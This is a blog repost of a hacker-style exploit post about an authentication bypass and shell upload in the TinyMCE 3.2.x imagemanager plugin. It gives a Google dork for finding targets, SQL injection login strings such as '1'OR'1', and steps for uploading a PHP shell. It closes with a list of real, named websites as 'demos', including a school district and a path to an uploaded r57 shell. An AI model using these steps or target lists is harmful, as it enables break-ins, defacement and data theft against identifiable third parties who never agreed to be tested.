TinyMCE Auth bypass Shell Upload

Kurou
TinyMCE Auth bypass Shell Upload
Kurou 
 

> Title : TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites

> Author : KedAns-Dz
+ E-mail : ked-h (@hotmail.com / @1337day.com)
+ FaCeb0ok : fb.me/Inj3ct0rK3d
+ TwiTter : @kedans

# Platform : PHP / WebApp
+ Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple

*************************************************************************/

# TinyMCE v3.2.7 or ..X is suffer from Multiple vuln's / bug :p
# Remote Attacker can bypassin auth and upload files , shell's etc...
# 1st try with this dork :
google dork : allinurl:/plugins/imagemanager/pages/im/index.html

# (1) how to bypass auth? =>
you can bypass auth by simple poc of bypassing like
  site.tld/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
  user & pass : '1'OR'1'
 =+ demo's :
 http://www.prodigy-school.ru/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
 user : '1'OR'1'
 pass : '1'OR'1'
 http://www.erez-komarovsky.co.il/admin/login.php
 user: 1' OR '1'='1
 pass: 1' OR '1'='1
 
 && or ( if the simple poc d'nt workin after u access : 
 site.tld/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html )
 clic rapidly of the button stop in browser for stop the redirction ;) 
 
# (2) Upload Shell/Files .. (.txt .gif) or (.php by use temperData or http header :D ) =>

poc : site.tld/[path]/plugins/imagemanager/pages/im/index.html
and clic in ( upload / add / [+] ) button & upload what you need ;)
for ex: 
    shell after up : http://www.prodigy-school.ru/data/r57.txt

 =+ Demo's:
  
http://www.allemandemusic.com.hostbaby.com/dashboard/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html
http://gesundheit-gt.de/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.yorkshiredales-stay.co.uk/maintain/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.erez-komarovsky.co.il/admin/include/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://freewb.hu/freewbr/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://volunteermckinney.galaxydigital.com/includes/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.eastpennsd.org/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.htm
http://209.18.48.74/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html

Share This :
Kurou

comment 0 komentar

more_vert
Subscribe to: Post Comments (Atom)